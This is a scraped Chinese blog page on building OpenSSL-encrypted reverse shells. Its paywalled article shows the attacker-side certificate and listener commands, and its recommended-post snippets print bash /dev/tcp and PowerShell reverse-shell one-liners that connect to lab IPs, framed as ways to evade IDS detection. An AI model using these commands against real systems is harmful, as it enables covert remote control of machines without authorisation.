使用OpenSSL的反弹shell

最新推荐文章于 2025-01-08 17:22:40 发布
最新推荐文章于 2025-01-08 17:22:40 发布
阅读量601 收藏
点赞数
分类专栏: web安全 文章标签: 反弹shell openssl 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mirocky/article/details/133794631
版权

1、攻击机生成证书:

 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

生成证书

2、攻击机开启服务

openssl s_server -quiet -key key.pem -cert cert.pem -port 80

最低0.47元/天 解锁文章
反弹shell原理与实现
悦分享
08-02 3595
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
linux类反弹shell特征提取
SHELLCODE_8BIT的博客
04-09 2119
1.标准输入0的pipe被转到其他进程,也就是只需要匹配bash的0既然,不需要12也匹配,这样减少性能消耗。这种没有回显,但是可以执行命令。pipe和爷进程交互。
Openssl反弹加密shell
干铮的博客
03-14 966
使用Openssl反弹加密shell 进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。 使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。 ...
openssl 来进行反弹shell
Arzum的博客
08-13 288
1. 服务端开启两个监听,从 ip:port1 获取命令发送给 cmd.exe执行,然后结果返回到 ip:port2。3. 在目标上用openssl加密反弹shell的流量(使用openssl单向认证)2.服务端上监听反弹shell
利用OpenSSL搭建一个反弹shell
loon208的博客
04-01 674
渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。 准备 首先我们需要在自己的机器上生成密钥,这里用kali来演示。 root@kali#...
红队隧道加密之OpenSSL加密反弹Shell(一)
xf555er的博客
11-26 1068
OpenSSL是一个开源的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上其主要库是以C语言所写成,实现了基本的加密功能,实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris,Linux,Mac OS X与各种版本的开放源代码BSD操作系统)。它也提供了一个移植版本,可以在IBM i(OS/400)上运作。
OpenSSL反弹加密shell
redwand的博客
02-21 476
在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的。本文介绍了openssl反弹加密shell的常规方法。
反弹shell
songling515010475的专栏
05-11 1718
一、通过bash反弹shell 1、 在攻击机上通过nc命令监听2222端口 ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 2222 listening on [any] 2222 ... 2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口 [root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&1 3、连..
openssl命令_利用OpenSSL搭建一个反弹shell
weixin_39705069的博客
12-06 175
渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。准备首先我们需要在自己的机器上生成密钥,这里用kali来演示。root@kali# openssl r...
openssl命令_使用OpenSsl加密反弹shell
weixin_39713538的博客
11-24 405
一、实际环境:当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shellOpenSSL ...
利用OpenSSL加密反弹shell流量
The current road is different, love needs to distinguish between right and wrong
02-15 3465
简介 在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。 实验环境 kali:192.168.95.128 centos:192.168.95.147 Wireshark抓包 在kali上使用nc监听一个端口 nc -lvvp 4444 将centos的shell反弹过去 bash -i
反弹shell,一篇概括
m0_63733486的博客
06-17 320
在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。
干货分享—Linux之渗透测试常用反弹shell方法总结!黑客技术零基础入门到精通实战教程!
白帽阿叁的博客
01-08 989
反弹shell主要就是让我们能远程连接到目标控制台并且下达指令,来达到操控目标资产的目的!正向反弹: 控制端(也就是我们自己的机器)发送请求去连接被控端(目标机器)的方式。不过这种方式会受到防火墙,路由,等各种很多因素影响,很难成功。反向反弹: 被控端主动发送请求连接我们的控制端。这种方法是可以想办法避开防火墙和路由的一些限制的!
渗透测试中反弹shell的27种实战方法全解析
互联网环境恶劣,现在积极的想从事网络安全行业
01-06 1330
反弹 shell 技术作为渗透测试领域的关键技能,犹如一把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现并修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解并熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
shell openssl_OpenSSL Shell命令教程与示例
cunjiu9486的博客
10-08 1417
shell opensslOpenSSL is free security protocols and implementation library provided by Free Software community. OpenSSL libraries are used by a lot of enterprises in their systems and products. OpenSS...
利用OpenSSL反弹shell进行流量加密
jqx_Gold的博客
05-23 407
测试环境 攻击机:192.168.137.129(Kali) 靶机:192.168.137.128(CentOS) 1、在攻击机上使用OpenSSL生成自签名证书 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 2、 在攻击机上监听端口 openssl s_server -quiet -key key.pem -cert cert.pem -port [port] 3、在
常用的一句话反弹shell总结
热门推荐
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
Linux反弹shell中重定向的理解(个人见底、方家斧正)
痴人说梦梦中人
09-26 775
重定向在反弹shell中的利用 攻击机执行命令(IP:192.168.59.128): nc -l -vv -p 1234 靶机执行命令: bash -i &> /dev/tcp/192.168.59.128/1234 0>&1 攻击机执行命令中: -l 开启连接监听(TCP) -vv 详细信息(不是我写错了,可以是双V,展示更详细信息) -p 靶机连接攻击机的端...
扔掉 OpenSSL,拥抱 LibreSSL——远离心脏出血与溺亡
jywHltj的专栏
07-12 760
能够如愿。 2016 年 3 月初 OpenSSL 再次爆出与 2014 年的心脏出血(Heartbleed)同样严重的新漏洞——溺亡(DROWN)!在获悉这一消息的时候第一时间我去看 LibreSSL 有没有受影响,正如所料——没有(见下图)!这让我觉得 LibreSSL 取代 OpenSSL 更加必要。 关于 DROWN 溺亡漏洞如果还没了解过,可以参考: https://www.openssl.org/news/secadv/20160301.txt https://www.wosign
反弹shell的题目
最新发布
03-18
当无法使用传统的 NC 工具时,可以利用 Powershell 实现类似的反弹Shell功能。例如,可以在目标机器上运行如下命令来建立反向连接[^2]: ```powershell $client = New-Object System.Net.Sockets.TCPClient("攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值